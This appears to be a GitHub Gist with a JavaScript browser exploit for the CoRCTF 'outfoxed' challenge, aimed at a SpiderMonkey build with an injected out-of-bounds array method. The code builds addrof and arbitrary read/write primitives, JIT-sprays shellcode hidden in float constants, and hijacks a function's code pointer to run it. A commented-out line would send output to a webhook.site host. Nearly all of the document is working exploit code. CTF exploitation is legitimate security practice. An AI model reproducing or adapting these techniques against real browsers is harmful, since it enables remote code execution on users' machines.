Created
August 26, 2021 11:10
-
-
Save dkdna/49c82af8b44088f30c584cc33509be2b to your computer and use it in GitHub Desktop.
CoRCTF - outfoxed
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var tmp_buf = new ArrayBuffer(8) | |
| var f64 = new Float64Array(tmp_buf) | |
| var u32 = new Uint32Array(tmp_buf) | |
| var BASE = 0x100000000 | |
| function f2i(f) { | |
| f64[0] = f | |
| return u32[0] + BASE*u32[1] | |
| } | |
| function i2f(i) { | |
| u32[0] = i % BASE | |
| u32[1] = i / BASE | |
| return f64[0] | |
| } | |
| function hex(x) { | |
| if (x < 0) return `-${hex(-x)}` | |
| return `0x${x.toString(16)}` | |
| } | |
| function println(data) { | |
| // navigator.sendBeacon("https://webhook.site/a4d54f3b-1de9-4f06-b5db-8126654a8e8c", data) | |
| print("[*] "+data) | |
| } | |
| let arr1 = new Array(10) | |
| let arr2 = new Uint32Array(10) | |
| arr1[0] = 13.37 | |
| arr2[0] = 0x1234 | |
| // dumpObject(arr1) | |
| // dumpObject(arr2) | |
| const offset = 0x11 | |
| const arr2_addr = f2i(arr1.oob(offset)) - 0x38 | |
| println("arr2 @ "+hex(arr2_addr)) | |
| function read(addr){ | |
| arr1.oob(offset, i2f(addr)); | |
| u32[0] = arr2[0]; | |
| u32[1] = arr2[1]; | |
| return f2i(f64[0]); | |
| } | |
| function write(addr, value){ | |
| arr1.oob(offset, i2f(addr)); | |
| f64[0] = i2f(value); | |
| arr2[0] = u32[0]; | |
| arr2[1] = u32[1]; | |
| } | |
| function addrof(obj) { | |
| arr1.oob(offset, i2f(arr2_addr + 0x38)); | |
| arr1.oob(offset + 1, obj); | |
| u32[0] = arr2[0]; | |
| u32[1] = arr2[1] & 0xffff; | |
| return f2i(f64[0]); | |
| } | |
| function read8f(addr){ | |
| arr1.oob(offset, i2f(addr)); | |
| u32[0] = arr2[0]; | |
| u32[1] = arr2[1]; | |
| return f64[0]; | |
| } | |
| println("Testing primitives!"); | |
| const arr1_addr = addrof(arr1); | |
| println("arr1 @ "+hex(arr1_addr)) | |
| println("value at array: "+hex(read(arr1_addr + 0x28))) | |
| function func() { | |
| const magic = 4.183559446463817e-216; | |
| const a1 = 2.4877840611688293e-275; | |
| const a2 = 2.4879820007592195e-275; | |
| const a3 = 2.4879355641325583e-275; | |
| const a4 = 2.5047751329248284e-275; | |
| const a5 = 2.4881023834790942e-275; | |
| const a6 = -6.828523606692364e-229; | |
| } | |
| for (i = 0; i < 100000; i++) { | |
| func() | |
| } | |
| func_addr = addrof(func) | |
| shellcode_addr = read(func_addr + 0x28) | |
| rx_page = read(shellcode_addr) | |
| println("func @ "+hex(func_addr)) | |
| println("shellcode @ "+hex(shellcode_addr)) | |
| println("rx @ "+hex(rx_page)) | |
| f64[0] = i2f(rx_page); | |
| u32[0] = u32[0] & 0xfffff000; | |
| jit_addr = f2i(f64[0]); | |
| println("jit page @ "+hex(jit_addr)) | |
| // arr1.brk() | |
| while(read8f(jit_addr) != 4.183559446463817e-216 || read8f(jit_addr + 0xe) != 2.4877840611688293e-275) { | |
| // println("searching @ "+hex(jit_addr)); //! Remove this print for the exploit to work | |
| jit_addr = jit_addr + 1; | |
| } | |
| println("found shellcode @ "+hex(jit_addr)); | |
| jit_addr = jit_addr + 14; | |
| write(shellcode_addr, jit_addr); | |
| // arr1.brk() | |
| func() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment